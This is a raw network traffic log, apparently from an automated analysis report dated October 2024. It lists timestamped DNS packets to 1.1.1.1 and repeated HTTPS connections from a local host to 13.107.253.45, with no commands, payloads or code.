                                                                                                                                                                            Oct 28, 2024 19:12:42.301004887 CET5915153192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:42.306554079 CET53591511.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.306622028 CET5915153192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:42.306655884 CET5915153192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:42.312299013 CET53591511.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.455910921 CET4434988113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.456474066 CET49881443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.456501961 CET4434988113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.456973076 CET49881443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.456983089 CET4434988113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.590400934 CET4434988113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.590470076 CET4434988113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.590538979 CET49881443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.590568066 CET4434988113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.590600967 CET4434988113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.590670109 CET49881443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.591381073 CET49881443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.591412067 CET4434988113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.591438055 CET49881443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.591454029 CET4434988113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.599525928 CET59152443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.599561930 CET4435915213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.599642992 CET59152443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.599819899 CET59152443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.599831104 CET4435915213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.608831882 CET4434988413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.609249115 CET49884443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.609256983 CET4434988413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.609698057 CET49884443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.609703064 CET4434988413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.611288071 CET4434988213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.611536026 CET49882443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.611547947 CET4434988213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.611852884 CET49882443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.611859083 CET4434988213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.619592905 CET4434988313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.619916916 CET49883443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.619935036 CET4434988313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.620232105 CET49883443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.620243073 CET4434988313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.763114929 CET4434988413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.763178110 CET4434988413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.763230085 CET49884443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.763417006 CET49884443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.763431072 CET4434988413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.763439894 CET49884443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.763444901 CET4434988413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.764128923 CET4434988213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.764283895 CET4434988213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.764338970 CET49882443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.764517069 CET49882443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.764539003 CET4434988213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.764550924 CET49882443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.764556885 CET4434988213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.765069962 CET4434988313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.765115023 CET4434988313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.765161991 CET49883443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.765181065 CET4434988313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.765206099 CET4434988313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.765259981 CET49883443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.765566111 CET49883443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.765573978 CET4434988313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.765588045 CET49883443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.765594006 CET4434988313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.767260075 CET59153443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.767285109 CET4435915313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.767366886 CET59153443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.767574072 CET59153443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.767587900 CET4435915313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.768676996 CET59154443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.768701077 CET4435915413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.768743992 CET59155443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.768752098 CET4435915513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.768760920 CET59154443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.768810987 CET59155443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.768861055 CET59154443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.768872976 CET4435915413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.768933058 CET59155443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.768946886 CET4435915513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.786983967 CET4434988513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.787354946 CET49885443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.787364960 CET4434988513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.787951946 CET49885443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.787956953 CET4434988513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.899627924 CET53591511.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.900475979 CET5915153192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:42.906223059 CET53591511.1.1.1192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.906287909 CET5915153192.168.2.41.1.1.1
                                                                                                                                                                            Oct 28, 2024 19:12:42.932200909 CET4434988513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.932228088 CET4434988513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.932271957 CET4434988513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.932277918 CET49885443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.932312965 CET49885443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.942950964 CET49885443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.942960024 CET4434988513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.945827961 CET59157443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.945878029 CET4435915713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:42.945947886 CET59157443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.946094990 CET59157443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:42.946124077 CET4435915713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.355427027 CET4435915213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.355982065 CET59152443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.355993986 CET4435915213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.356482983 CET59152443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.356487989 CET4435915213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.490595102 CET4435915213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.490741968 CET4435915213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.490806103 CET59152443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.490910053 CET59152443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.490926027 CET4435915213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.490937948 CET59152443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.490942955 CET4435915213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.493973017 CET59158443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.494000912 CET4435915813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.494080067 CET59158443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.494257927 CET59158443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.494268894 CET4435915813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.512825012 CET4435915513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.513168097 CET59155443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.513187885 CET4435915513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.513578892 CET59155443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.513583899 CET4435915513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.519856930 CET4435915413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.520111084 CET59154443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.520121098 CET4435915413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.520416975 CET59154443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.520421982 CET4435915413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.545392036 CET4435915313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.545727015 CET59153443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.545743942 CET4435915313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.546097040 CET59153443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.546102047 CET4435915313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.652085066 CET4435915513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.652242899 CET4435915513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.652312040 CET59155443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.652436972 CET59155443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.652450085 CET4435915513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.652456999 CET59155443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.652461052 CET4435915513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.655571938 CET59159443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.655613899 CET4435915913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.655683041 CET59159443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.655858040 CET59159443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.655874014 CET4435915913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.659297943 CET4435915413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.659343004 CET4435915413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.659385920 CET4435915413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.659401894 CET59154443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.659430981 CET59154443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.659471989 CET59154443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.659490108 CET4435915413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.659498930 CET59154443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.659506083 CET4435915413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.661506891 CET59160443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.661549091 CET4435916013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.661628962 CET59160443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.661765099 CET59160443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.661783934 CET4435916013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.689567089 CET4435915313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.691718102 CET4435915713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.692076921 CET59157443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.692099094 CET4435915713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.692503929 CET59157443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.692516088 CET4435915713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.693819046 CET4435915313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.693902969 CET59153443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.693922043 CET59153443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.693922043 CET59153443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.693929911 CET4435915313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.693938971 CET4435915313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.695974112 CET59161443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.696034908 CET4435916113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.696206093 CET59161443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.696295977 CET59161443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.696327925 CET4435916113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.828282118 CET4435915713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.829092979 CET4435915713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.829155922 CET59157443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.829188108 CET59157443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.829200029 CET4435915713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.829210043 CET59157443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.829214096 CET4435915713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.831720114 CET59162443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.831743002 CET4435916213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:43.831804037 CET59162443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.831942081 CET59162443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:43.831959009 CET4435916213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.402961969 CET4435915813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.403393984 CET59158443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.403409958 CET4435915813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.403867960 CET59158443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.403872967 CET4435915813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.421456099 CET4435915913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.421850920 CET59159443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.421901941 CET4435915913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.422246933 CET59159443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.422264099 CET4435915913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.424283028 CET4435916013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.424515963 CET59160443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.424534082 CET4435916013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.424851894 CET59160443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.424856901 CET4435916013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.464776993 CET4435916113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.465204000 CET59161443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.465243101 CET4435916113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.465610981 CET59161443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.465627909 CET4435916113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.542282104 CET4435915813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.542370081 CET4435915813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.542418003 CET59158443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.542428970 CET4435915813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.542494059 CET4435915813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.542541981 CET59158443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.542699099 CET59158443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.542711973 CET4435915813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.542721033 CET59158443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.542726040 CET4435915813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.546236992 CET59163443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.546289921 CET4435916313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.546382904 CET59163443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.546658039 CET59163443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.546686888 CET4435916313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.559580088 CET4435915913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.559726000 CET4435915913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.559789896 CET59159443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.559844017 CET59159443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.559858084 CET4435915913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.559870958 CET59159443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.559878111 CET4435915913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.562108040 CET59164443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.562141895 CET4435916413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.562210083 CET59164443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.562351942 CET59164443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.562366009 CET4435916413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.563308954 CET4435916013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.563390970 CET4435916013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.563446045 CET59160443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.563492060 CET59160443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.563503981 CET4435916013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.563520908 CET59160443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.563527107 CET4435916013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.566375971 CET59165443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.566401958 CET4435916513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.566473007 CET59165443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.566589117 CET59165443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.566602945 CET4435916513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.580672979 CET4435916213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.581218004 CET59162443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.581228018 CET4435916213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.581794977 CET59162443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.581800938 CET4435916213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.602864981 CET4435916113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.603451014 CET4435916113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.603521109 CET59161443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.603569031 CET59161443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.603569031 CET59161443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.603595018 CET4435916113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.603620052 CET4435916113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.606574059 CET59166443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.606585979 CET4435916613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.606650114 CET59166443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.606765985 CET59166443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.606774092 CET4435916613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.722752094 CET4435916213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.722826958 CET4435916213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.722879887 CET59162443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.722884893 CET4435916213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.722944021 CET59162443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.723543882 CET59162443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.723551989 CET4435916213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.723565102 CET59162443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.723570108 CET4435916213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.741394997 CET59167443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.741411924 CET4435916713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:44.741496086 CET59167443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.741692066 CET59167443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:44.741699934 CET4435916713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:45.306838989 CET4435916313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:45.307413101 CET59163443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:45.307462931 CET4435916313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:45.307883978 CET59163443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:45.307898998 CET4435916313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:45.325834990 CET4435916413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:45.331192017 CET4435916513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:45.332225084 CET59164443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:45.332252026 CET4435916413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:45.332705021 CET59164443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:45.332710028 CET4435916413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:45.333327055 CET59165443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:45.333357096 CET4435916513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:45.333733082 CET59165443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:45.333738089 CET4435916513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:45.408144951 CET4435916613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:45.409614086 CET59166443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:45.409629107 CET4435916613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:45.410340071 CET59166443192.168.2.413.107.253.45
